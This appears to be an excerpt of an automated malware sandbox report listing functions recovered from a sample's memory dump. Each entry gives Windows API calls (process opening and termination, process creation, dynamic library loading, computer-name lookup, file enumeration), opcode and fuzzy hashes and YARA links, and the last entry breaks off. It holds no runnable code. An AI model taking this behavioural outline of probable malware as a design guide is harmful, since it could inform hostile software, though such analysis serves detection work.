                              • Opcode ID: 5f0fa91bbbb0a0188009bd1f1d7564a66cf1ce072b0cdf307afddb29c5c40e32
                              • Instruction ID: d7a6488eb076cc2e5666e165281bba6f364f2fbdccbefba2a786e381a515df49
                              • Opcode Fuzzy Hash: 5f0fa91bbbb0a0188009bd1f1d7564a66cf1ce072b0cdf307afddb29c5c40e32
                              • Instruction Fuzzy Hash: 20015EB1900129BBDB109BA5DD89DEF7FBCEF05361F004158F5A6E2185D7799601CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01046A05, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • GetLastError.KERNEL32(?,?,?,00001000,?,01050354,747DF750), ref: 01046A86
                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,01050354,747DF750), ref: 01046B0B
                              • CloseHandle.KERNEL32(00000000,?,01050354,747DF750), ref: 01046B25
                              • OpenProcess.KERNEL32(00100000,00000000,00000000,?,01050354,747DF750), ref: 01046B5A
                                • Part of subcall function 01025F87: RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,01045E73), ref: 01025F97
                              • WaitForSingleObject.KERNEL32(?,00000064,?,01050354,747DF750), ref: 01046BDC
                              • CloseHandle.KERNEL32(F0FFC983,?,01050354,747DF750), ref: 01046C03
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                              • String ID:
                              • API String ID: 3115907006-0
                              • Opcode ID: 479d6f15765b3121b321b86601815cf712ca2202795fe8a645aceb267bea4dee
                              • Instruction ID: 2851412c70c3b6f7eb9d447f0fb2bb9fa190e4ca68a7a01a546da37fd38181a0
                              • Opcode Fuzzy Hash: 479d6f15765b3121b321b86601815cf712ca2202795fe8a645aceb267bea4dee
                              • Instruction Fuzzy Hash: 9D8118B1E00219EFDB11DF98C984AEDBBB5FF09300F1484A5E985AB251E736AD50CF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103DC6E, Relevance: 9.2, APIs: 6, Instructions: 198timestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • FileTimeToLocalFileTime.KERNEL32(00000000,010257F0), ref: 0103DCCD
                              • FileTimeToSystemTime.KERNEL32(010257F0,?), ref: 0103DCDB
                              • lstrlenW.KERNEL32(00000010), ref: 0103DCEB
                              • lstrlenW.KERNEL32(00000218), ref: 0103DCF7
                              • FileTimeToLocalFileTime.KERNEL32(00000008,010257F0), ref: 0103DDE4
                              • FileTimeToSystemTime.KERNEL32(010257F0,?), ref: 0103DDF2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                              • String ID:
                              • API String ID: 1122361434-0
                              • Opcode ID: e4a6036b1f2a2d0d116b1cc8bd8f6daeb9d173dbebaeae0e92f965d74fc7eba8
                              • Instruction ID: 036f81737ec93fd8d09b475240992f658901c283bf50e6dc07f518e04aa3aa90
                              • Opcode Fuzzy Hash: e4a6036b1f2a2d0d116b1cc8bd8f6daeb9d173dbebaeae0e92f965d74fc7eba8
                              • Instruction Fuzzy Hash: 36711EB190021AEBCB60DFE9C984AEEB7FCFB48304F544466F685D7240E7399A45CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01024862, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(?,00000020), ref: 01024922
                              • StrChrA.SHLWAPI(00000001,00000020), ref: 01024933
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 01024973
                              • memcpy.NTDLL(00000000,?,00000007), ref: 010249A0
                              • memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 010249AF
                              • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 010249C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy$AllocateHeap
                              • String ID:
                              • API String ID: 4068229299-0
                              • Opcode ID: e51dc977a08744e3a746f8e06bdb30cabf8845b02fa65671dbf771a5a457df3f
                              • Instruction ID: 0a04543dcfa98fb787d86c052ad0dc4e4150cd7a2d0a4ea4c646d3ce2bc3874d
                              • Opcode Fuzzy Hash: e51dc977a08744e3a746f8e06bdb30cabf8845b02fa65671dbf771a5a457df3f
                              • Instruction Fuzzy Hash: 9451F3315042D5AFC7528F78C8E5BEA7FB8EF47218B2980D9E8C5CE022E6229947C750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01044A95, Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,?), ref: 01044AF0
                              • GetLastError.KERNEL32 ref: 01044B16
                              • SetEvent.KERNEL32(00000000), ref: 01044B29
                              • GetModuleHandleA.KERNEL32(00000000), ref: 01044B72
                              • memset.NTDLL ref: 01044B87
                              • RtlExitUserThread.NTDLL(?), ref: 01044BBC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                              • String ID:
                              • API String ID: 3978817377-0
                              • Opcode ID: e85bdc7fadccf03aea3077fe5acc2d153ce71a39f92b1dbed730d1da883761ed
                              • Instruction ID: 923f4ec7b4826645fac43f9e4413f26a1419cb6ff3176c84ac9523d8f735ea31
                              • Opcode Fuzzy Hash: e85bdc7fadccf03aea3077fe5acc2d153ce71a39f92b1dbed730d1da883761ed
                              • Instruction Fuzzy Hash: 24416BF4900204AFDB209FA8CDC8EAEBBFDFF8571172405A9F982D2104D735A940CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103E891, Relevance: 9.1, APIs: 6, Instructions: 121memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 0103E8AA
                                • Part of subcall function 0103BF04: lstrlenW.KERNEL32(00000000,747DF560,00000000,?,00000000,?,?,0102EFEF,00000020), ref: 0103BF30
                                • Part of subcall function 0103BF04: RtlAllocateHeap.NTDLL(00000000,?), ref: 0103BF42
                                • Part of subcall function 0103BF04: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0102EFEF,00000020), ref: 0103BF5F
                                • Part of subcall function 0103BF04: lstrlenW.KERNEL32(00000000,?,?,0102EFEF,00000020), ref: 0103BF6B
                                • Part of subcall function 0103BF04: HeapFree.KERNEL32(00000000,00000000,?,?,0102EFEF,00000020), ref: 0103BF7F
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0103E8E2
                              • CloseHandle.KERNEL32(?), ref: 0103E8F0
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00001000,00000000,00000000,00001000), ref: 0103E9C2
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0103E9D1
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001000,00000000,00000000,00001000), ref: 0103E9E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                              • String ID:
                              • API String ID: 1719504581-0
                              • Opcode ID: ca98692f22276f1ddb9350c38f6a338590b0ffdcd5fadb888afdf3715d8cba44
                              • Instruction ID: 40d63f818695f4938987d33cf38f5d027f9e22d35445d147e95dae97324063a4
                              • Opcode Fuzzy Hash: ca98692f22276f1ddb9350c38f6a338590b0ffdcd5fadb888afdf3715d8cba44
                              • Instruction Fuzzy Hash: 3C41937160030AEBEBA1DF98D884A9E7BBDBFC4700F000166FAC5A7154DB76D944CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102E933, Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b883b64e7bdabe5f7f33f1deaf8f312d5c13957edcf7fbeeb2a543629776c70f
                              • Instruction ID: 91b3121fc62d253c064a41f6122d5218c706a5cc6bb66db118572b7b62ccdc11
                              • Opcode Fuzzy Hash: b883b64e7bdabe5f7f33f1deaf8f312d5c13957edcf7fbeeb2a543629776c70f
                              • Instruction Fuzzy Hash: C941D5B1640722EFD7709F69CC8891BBBE8FB44360B504A2DF2EAC6580D775A804CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102177F, Relevance: 9.1, APIs: 6, Instructions: 104stringsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010334A4: lstrlen.KERNEL32(0102EFEF,747DF560,00000000,?,00000000,0103BF21,?,00000000,?,?,0102EFEF,00000020), ref: 010334B3
                                • Part of subcall function 010334A4: mbstowcs.NTDLL ref: 010334CF
                              • lstrlenW.KERNEL32(00000000,?), ref: 010217D2
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 0103F68B
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,?,00000000), ref: 0103F697
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F6DF
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F6FA
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F732
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?), ref: 0103F73A
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F75D
                                • Part of subcall function 0103F63F: wcscpy.NTDLL ref: 0103F76F
                              • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 010217F3
                              • lstrlenW.KERNEL32(?), ref: 0102181D
                                • Part of subcall function 0103F63F: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0103F795
                                • Part of subcall function 0103F63F: RtlEnterCriticalSection.NTDLL(?), ref: 0103F7CA
                                • Part of subcall function 0103F63F: RtlLeaveCriticalSection.NTDLL(?), ref: 0103F7E6
                                • Part of subcall function 0103F63F: FindNextFileW.KERNEL32(?,00000000), ref: 0103F7FF
                                • Part of subcall function 0103F63F: WaitForSingleObject.KERNEL32(00000000), ref: 0103F811
                                • Part of subcall function 0103F63F: FindClose.KERNEL32(?), ref: 0103F826
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F83A
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F85C
                              • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0102183A
                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 01021851
                              • PathFindFileNameW.SHLWAPI(0000001E), ref: 01021866
                                • Part of subcall function 0102C627: lstrlenW.KERNEL32(?,?,00000002,00000000,?,?,?,0102187D,?,0000001E,?), ref: 0102C63C
                                • Part of subcall function 0102C627: lstrlenW.KERNEL32(?,?,?,?,0102187D,?,0000001E,?), ref: 0102C644
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                              • String ID:
                              • API String ID: 2670873185-0
                              • Opcode ID: 4f5592418d766dbffdda90c042d57b0cb7e30a36da181dfce1734c83524677d9
                              • Instruction ID: 152ef44de1ed054476c14eb1150f98ff5c7067d75abe016fd5d4d2f95bdd82a5
                              • Opcode Fuzzy Hash: 4f5592418d766dbffdda90c042d57b0cb7e30a36da181dfce1734c83524677d9
                              • Instruction Fuzzy Hash: FC316FB6404216AFC721AF68C9C486FBBEDFF88254F00096AF5D4D3221E776D9058B52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010448B8, Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 010448F5
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,01030027), ref: 0104492B
                              • GetComputerNameW.KERNEL32(00000000,?), ref: 01044939
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01044950
                              • GetComputerNameW.KERNEL32(00000000,?), ref: 01044961
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01030027), ref: 01044987
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateComputerFreeName
                              • String ID:
                              • API String ID: 3439771632-0
                              • Opcode ID: d167a95b2460998fa6ea5f88530986dd5d0e0189a619e3531b3f499037ac90cd
                              • Instruction ID: 109a80f7e147d58ac3ca22d8e5cac1305afa223698c621cde6a3799222b4d276
                              • Opcode Fuzzy Hash: d167a95b2460998fa6ea5f88530986dd5d0e0189a619e3531b3f499037ac90cd
                              • Instruction Fuzzy Hash: F931ECBAA00209EFDB50DFA9DDC49AEBBFAFB48304B144469F985D3214D7359E44DB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01027351, Relevance: 9.1, APIs: 6, Instructions: 92memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?), ref: 0102736D
                              • lstrlen.KERNEL32(?), ref: 01027383
                              • lstrlen.KERNEL32(?), ref: 01027398
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 010273FD
                              • _snprintf.NTDLL ref: 01027423
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001), ref: 01027441
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFree_snprintf
                              • String ID:
                              • API String ID: 3180502281-0
                              • Opcode ID: 80dac5697c53d5f11094c3e3bb1879cf5f7086a7ff77f1a46947d7c4bbe8480d
                              • Instruction ID: aad79c72897e031a3e528ea076ccdea23eb349f066a90dd403d3470c057b4ae6
                              • Opcode Fuzzy Hash: 80dac5697c53d5f11094c3e3bb1879cf5f7086a7ff77f1a46947d7c4bbe8480d
                              • Instruction Fuzzy Hash: 6331BC76900229FFDF21DFA9CC808AF7BAAFB44340B008829FD85A7114D7769D10DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103D4BA, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                              Download Yara Rule
                              APIs
                              • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0103D4D4
                              • CreateWaitableTimerA.KERNEL32(01050244,00000003,?), ref: 0103D4F1
                              • GetLastError.KERNEL32(?,?,01028C58,?), ref: 0103D502
                                • Part of subcall function 010432FF: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                                • Part of subcall function 010432FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                                • Part of subcall function 010432FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                                • Part of subcall function 010432FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D542
                              • SetWaitableTimer.KERNEL32(?,01028C58,00000000,00000000,00000000,00000000,?,?,01028C58,?), ref: 0103D561
                              • HeapFree.KERNEL32(00000000,01028C58,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D577
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                              • String ID:
                              • API String ID: 1835239314-0
                              • Opcode ID: 26b621dcf1d78a7f35b0cf2e7185a8ab4d7e2a6835085c5f4e70779e481813fa
                              • Instruction ID: a7181646b5c658f99b2dd5d81c1bf4e9a218d2f6a4257fa99bf91e24b6c015a3
                              • Opcode Fuzzy Hash: 26b621dcf1d78a7f35b0cf2e7185a8ab4d7e2a6835085c5f4e70779e481813fa
                              • Instruction Fuzzy Hash: 063149B5A00209EBCB21DF9AC989CAFBFBDFBC4344B948056F586E7145D3359A40CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102490A, Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(?,00000020), ref: 01024922
                              • StrChrA.SHLWAPI(00000001,00000020), ref: 01024933
                                • Part of subcall function 01034527: lstrlen.KERNEL32(?,?,00000000,00000000,?,0103A640,00000000,?,?,00000000,00000001), ref: 01034539
                                • Part of subcall function 01034527: StrChrA.SHLWAPI(00000001,0000000D,?,0103A640,00000000,?,?,00000000,00000001), ref: 01034571
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 01024973
                              • memcpy.NTDLL(00000000,?,00000007), ref: 010249A0
                              • memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 010249AF
                              • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 010249C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              • Opcode ID: c98dcf9b4b5ad1ea3f45bcae5641405d4c116d8c8500695b7806a30f76fd5cb6
                              • Instruction ID: 5c6c888eaffc90bc8df1af8febc8ffe516d92fe3908ce9ca900af5639056a4d7
                              • Opcode Fuzzy Hash: c98dcf9b4b5ad1ea3f45bcae5641405d4c116d8c8500695b7806a30f76fd5cb6
                              • Instruction Fuzzy Hash: 2F215E76A00219BFDB21DF98CC84F9ABBECEF08744F054162F984DB155E675EA448BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010255B3, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                              Download Yara Rule
                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 010255F2
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01025603
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 0102561E
                              • GetLastError.KERNEL32(?,?,?,?), ref: 01025634
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 01025646
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0102565B
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                              • String ID:
                              • API String ID: 1822509305-0
                              • Opcode ID: cfd7b1936e6d4dec70c2263dbd77432d60dc9c7d172507dc41cfb4675ac3dc53
                              • Instruction ID: 395b8697741f7e90d538b09a1dfbe7e353658d3d801da9b73ac86af6bed83818
                              • Opcode Fuzzy Hash: cfd7b1936e6d4dec70c2263dbd77432d60dc9c7d172507dc41cfb4675ac3dc53
                              • Instruction Fuzzy Hash: BB117C7A901128FBCB325B95DD48CEF7FBEEF49390F004061F685A2024C6368A51EBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01025CC5, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 01025CED
                              • _strupr.NTDLL ref: 01025D28
                              • lstrlen.KERNEL32(00000000), ref: 01025D30
                              • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 01025D6F
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 01025D76
                              • GetLastError.KERNEL32 ref: 01025D7E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                              • String ID:
                              • API String ID: 110452925-0
                              • Opcode ID: 82167195a43e468897eaf0b9d78856cac17f61aa7be3f414c275387fb6a99bbb
                              • Instruction ID: d1d04c98adabef6e9a5130ca9687aa683854736a413b8de17fa0a0a33281d56d
                              • Opcode Fuzzy Hash: 82167195a43e468897eaf0b9d78856cac17f61aa7be3f414c275387fb6a99bbb
                              • Instruction Fuzzy Hash: 4311B2B9600225FFEB316B749D8C9EF77ADEB88750B100415FA87D6048EA7A9845CB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102DBF4, Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0103FC03,?,00000000,?,00002334), ref: 0102DC05
                              • lstrlen.KERNEL32(?,?,?,?,?,?,0103FC03,?,00000000,?,00002334,?,?,?,?,01029FC0), ref: 0102DC0C
                              • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0102DC1E
                              • _snprintf.NTDLL ref: 0102DC44
                                • Part of subcall function 0104339E: memset.NTDLL ref: 010433B3
                                • Part of subcall function 0104339E: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000020,00000000), ref: 010433EC
                                • Part of subcall function 0104339E: wcstombs.NTDLL ref: 010433F6
                                • Part of subcall function 0104339E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000020,00000000), ref: 01043427
                                • Part of subcall function 0104339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 01043453
                                • Part of subcall function 0104339E: TerminateProcess.KERNEL32(?,000003E5), ref: 01043469
                                • Part of subcall function 0104339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 0104347D
                                • Part of subcall function 0104339E: CloseHandle.KERNEL32(?), ref: 010434B0
                                • Part of subcall function 0104339E: CloseHandle.KERNEL32(?), ref: 010434B5
                              • _snprintf.NTDLL ref: 0102DC78
                                • Part of subcall function 0104339E: GetLastError.KERNEL32 ref: 01043481
                                • Part of subcall function 0104339E: GetExitCodeProcess.KERNEL32(?,00000001), ref: 010434A1
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 0102DC95
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                              • String ID:
                              • API String ID: 1481739438-0
                              • Opcode ID: 3a17084b3362cd26a170378a2c18042d71ee9cd26b02286457de51bddafce7d8
                              • Instruction ID: 69822bcc9d96c26a64595977b6d1b95632be8bf1f8a25dcc76a14521aa4dce62
                              • Opcode Fuzzy Hash: 3a17084b3362cd26a170378a2c18042d71ee9cd26b02286457de51bddafce7d8
                              • Instruction Fuzzy Hash: 3E11B1B6500219FFCB219F54DD88EDF3F6DEB08360B154121F98997215C676E910DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010320D7, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000000,00000000,00000008,?,?,010274A5,010471E6,00000000,?,?,?,?,01024216,?,?), ref: 010320ED
                              • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 01032100
                              • lstrcpy.KERNEL32(00000008,?), ref: 01032122
                              • GetLastError.KERNEL32(0103E845,00000000,00000000,?,?,010274A5,010471E6,00000000,?,?,?,?,01024216,?,?), ref: 0103214B
                              • HeapFree.KERNEL32(00000000,00000000,?,?,010274A5,010471E6,00000000,?,?,?,?,01024216,?,?), ref: 01032163
                              • CloseHandle.KERNEL32(00000000,0103E845,00000000,00000000,?,?,010274A5,010471E6,00000000,?,?,?,?,01024216,?,?), ref: 0103216C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                              • String ID:
                              • API String ID: 2860611006-0
                              • Opcode ID: 0c1cab077fefd9134b40f47cf6b426e7d9fbc871023541c4f04000d087bc5004
                              • Instruction ID: 2147fdec7b9c7e291145d186ce30abc52bcc9dd4a76fff07e56a50f88290f804
                              • Opcode Fuzzy Hash: 0c1cab077fefd9134b40f47cf6b426e7d9fbc871023541c4f04000d087bc5004
                              • Instruction Fuzzy Hash: BE118179600305EFDB619F68DD8889FBBBCFB943607004569F696C3110DB359D05CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103EF2D, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • LoadLibraryA.KERNEL32(?,00000000,00000001,00000014,00000020,0103C64E,00000000,00000001), ref: 0103EF4D
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103EF6C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103EF81
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103EF97
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103EFAD
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103EFC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProc$AllocateHeapLibraryLoad
                              • String ID:
                              • API String ID: 2486251641-0
                              • Opcode ID: ef6f86a7bbfcbc34147b5da911c63bedf13d52db8eb4c7aada0327ac690e8561
                              • Instruction ID: b34c2e5a9a141674a141747c1c2a35e15ed4beb79ec025cc07536e037c5ae165
                              • Opcode Fuzzy Hash: ef6f86a7bbfcbc34147b5da911c63bedf13d52db8eb4c7aada0327ac690e8561
                              • Instruction Fuzzy Hash: AD11DAB220020F9FE760DB69D884D977BECEB447807151975B695C7109EB75D805CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103D619, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                              • GetCurrentThreadId.KERNEL32 ref: 0103D651
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                              • lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1175089793-0
                              • Opcode ID: 8949986024ce07f3bd7b7097a506eb459f8d672c8d15c7fcec38ff7e4eadb040
                              • Instruction ID: 14a9177a24a40ffd92846df8257ae923c38702ec2763dd8018d522cd60e1f529
                              • Opcode Fuzzy Hash: 8949986024ce07f3bd7b7097a506eb459f8d672c8d15c7fcec38ff7e4eadb040
                              • Instruction Fuzzy Hash: 5C01C876600115A7E7205BE99DD8EAB3FBCEBC57407050065BA99D3105DB79D8009B70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103976F, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLastmemset
                              • String ID: vids
                              • API String ID: 3276359510-3767230166
                              • Opcode ID: 6e7609b1a8b6077261975ac0e7dc84fb8a82b64256ad678f99b5c5dcb73b1033
                              • Instruction ID: 17a33c4685484564c37cee100ba61eaa62cc59c1ef6530fbe3d4d9b3ce7319c3
